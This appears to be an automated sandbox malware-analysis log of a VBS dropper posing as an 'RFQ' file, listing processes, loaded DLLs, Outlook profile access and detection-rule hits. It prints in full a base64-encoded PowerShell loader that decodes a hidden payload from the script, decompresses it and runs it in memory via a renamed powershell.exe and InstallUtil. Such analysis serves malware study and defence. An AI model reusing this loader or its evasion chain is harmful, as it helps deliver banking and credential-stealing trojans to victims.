                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs RFQ_43200046412000086500125.vbs
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2038788534.0000000007B90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ_43200046412000086500125.vbs
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs RFQ_43200046412000086500125.vbs
                      Source: RFQ_43200046412000086500125.vbs.exe.1.drBinary or memory string: OriginalFilenamePowerShell.EXEj% vs RFQ_43200046412000086500125.vbs
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2266
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2266Jump to behavior
                      Source: Process Memory Space: RFQ_43200046412000086500125.vbs.exe PID: 7728, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winVBS@8/5@3/2
                      Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\5e7a81857a353068
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mm5sfz2w.xtf.ps1Jump to behavior
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs"
                      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.00000000029C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeFile read: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbsJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" /Y
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" -enc JABBAG4AbwB2AHAAdABzAHMAaQBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAFAAYgBzAHEAcAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEEAbgBvAHYAcAB0AHMAcwBpAGoAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAGIAcwBxAHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEYAeABnAGoAYQB0AGIAeQBjAGIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFEAeQB5AGkAdAB0AHcAZgBiAHYAIAApADsAJABSAGIAbQB3AGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFoAawBuAGoAbwBrAHEAZQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABGAHgAZwBqAGEAdABiAHkAYwBiACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAG8AcAB5AFQAbwAoACAAJABSAGIAbQB3AGUAIAApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAGwAbwBzAGUAKAApADsAJABGAHgAZwBqAGEAdABiAHkAYwBiAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIAAkAFIAYgBtAHcAZQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAUQB5AHkAaQB0AHQAdwBmAGIAdgApADsAIAAkAEoAegBrAGwAcgBvAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABRAHkAeQBpAHQAdAB3AGYAYgB2ACkAOwAgACQAUQBtAHIAZwBjAGQAZQBqACAAPQAgACQASgB6AGsAbAByAG8AcwAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFEAbQByAGcAYwBkAGUAagAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQAUQBtAHIAZwBjAGQAZQBqAC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" -enc JABBAG4AbwB2AHAAdABzAHMAaQBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAFAAYgBzAHEAcAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEEAbgBvAHYAcAB0AHMAcwBpAGoAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAGIAcwBxAHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEYAeABnAGoAYQB0AGIAeQBjAGIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFEAeQB5AGkAdAB0AHcAZgBiAHYAIAApADsAJABSAGIAbQB3AGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFoAawBuAGoAbwBrAHEAZQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABGAHgAZwBqAGEAdABiAHkAYwBiACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAG8AcAB5AFQAbwAoACAAJABSAGIAbQB3AGUAIAApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAGwAbwBzAGUAKAApADsAJABGAHgAZwBqAGEAdABiAHkAYwBiAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIAAkAFIAYgBtAHcAZQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAUQB5AHkAaQB0AHQAdwBmAGIAdgApADsAIAAkAEoAegBrAGwAcgBvAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABRAHkAeQBpAHQAdAB3AGYAYgB2ACkAOwAgACQAUQBtAHIAZwBjAGQAZQBqACAAPQAgACQASgB6AGsAbAByAG8AcwAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFEAbQByAGcAYwBkAGUAagAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQAUQBtAHIAZwBjAGQAZQBqAC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: twext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: workfoldersshell.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: shacct.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: idstore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wlidprov.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: starttiledata.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: usermgrcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: provsvc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: usermgrproxy.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: acppage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2046638246.0000000009DB1000.00000004.00000800.00020000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.00000000070D6000.00000004.00000800.00020000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2038788534.0000000007B90000.00000004.08000000.00040000.00000000.sdmp
